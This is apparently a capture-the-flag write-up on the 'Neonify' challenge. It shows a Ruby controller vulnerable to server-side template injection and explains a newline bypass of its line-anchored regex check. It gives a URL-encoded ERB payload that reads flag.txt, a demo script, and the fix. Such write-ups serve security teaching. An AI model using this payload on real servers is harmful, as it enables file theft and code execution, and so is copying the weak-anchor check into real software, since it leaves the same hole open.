Ruby SSTI Bypass Validation Regex

Related to: What Is Cyber Security, CTF
Tags: #ssti, #htb

This is part of the HTB challenge called "Neonify". The server is affected by SSTI (server-side template injection); this is the part of the code that exposes the vulnerability:

controllers/neon.rb

```ruby
post '/' do
  # ^ and $ are line anchors in Ruby, so this only checks one line of the input
  if params[:neon] =~ /^[0-9a-z ]+$/i
    # user input is compiled and evaluated as an ERB template
    @neon = ERB.new(params[:neon]).result(binding)
  else
    @neon = "Malicious Input Detected"
  end
  erb :'index'
end
```
views/index.erb

```html
<body>
    <div class="wrapper">
        <h1 class="title">Amazing Neonify Generator</h1>
        <form action="/" method="post">
            <p>Enter Text to Neonify</p><br>
            <input type="text" name="neon" value="">
            <input type="submit" value="Submit">
        </form>
        <h1 class="glow"><%= @neon %></h1>
    </div>
</body>
```
As you can see, the submitted text is evaluated as an ERB template and the result is put into the index page without sanitization. You can check the vulnerable source code here:
Neonify.zip

Alright, so the normal payload would be: `<%= File.open('flag.txt').read %>`
But we can't use this directly, because it does not pass the `/^[0-9a-z ]+$/i` check. However, `^` and `$` within regexes in Ruby are bypassable: they match at the start and end of any line, not of the whole string (the strict anchors are `\A` and `\z`).
To bypass this, I referred to this solution: https://stackoverflow.com/questions/577653/difference-between-a-z-and-in-ruby-regular-expressions/577675#577675

You can bypass it using a newline (`\n`): the first line is purely alphanumeric and satisfies `^...$`, and the ERB tag goes on the second line. The payload becomes (URL-encoded: `%0a` is the newline, `%25` and `%3d` encode `%` and `=`, and `+` encodes a space):
neon=a%0a<%25%3d+File.open('flag.txt').read+%25>
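The following is an added example, not code from the challenge or the original write-up. It reproduces the controller's weak anchor check next to a strict `\A...\z` check and runs a constructed two-line input through both, so you can see that the line anchors accept the input and ERB then evaluates the second line, while the strict anchors reject it. The `neonify` helper, the constants and the harmless `<%= 6 * 7 %>` tag are all assumptions made for this demonstration.

```ruby
require 'erb'

# Weak check, as in the Neonify controller: ^ and $ are line anchors in Ruby,
# so a multi-line string passes if any single line is purely alphanumeric.
WEAK_RE = /^[0-9a-z ]+$/i

# Strict check: \A and \z anchor to the start and the absolute end of the
# string, so the whole input must match. (\Z would still allow a trailing "\n".)
STRICT_RE = /\A[0-9a-z ]+\z/i

def weak_ok?(input)
  input.match?(WEAK_RE)
end

def strict_ok?(input)
  input.match?(STRICT_RE)
end

# Mirrors the vulnerable controller: the input is only rendered as an ERB
# template when the supplied validator accepts it.
def neonify(input, validator)
  return 'Malicious Input Detected' unless validator.call(input)

  ERB.new(input).result(binding)
end

# Constructed inputs (not from the challenge): the second one hides a harmless
# ERB expression on the line after an alphanumeric first line.
BENIGN    = 'hello neon'
MULTILINE = "a\n<%= 6 * 7 %>"

if $PROGRAM_NAME == __FILE__
  puts weak_ok?(MULTILINE)                     # => true  (only the first line was checked)
  puts strict_ok?(MULTILINE)                   # => false
  puts neonify(MULTILINE, method(:weak_ok?))   # => "a\n42" (template was evaluated)
  puts neonify(MULTILINE, method(:strict_ok?)) # => "Malicious Input Detected"
end
```

Swapping `^`/`$` for `\A`/`\z` in the controller's regex is the one-line fix; the larger design problem is that user input is compiled as a template at all, so the safer pattern is to pass the text into a fixed template as data rather than treating it as template source.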
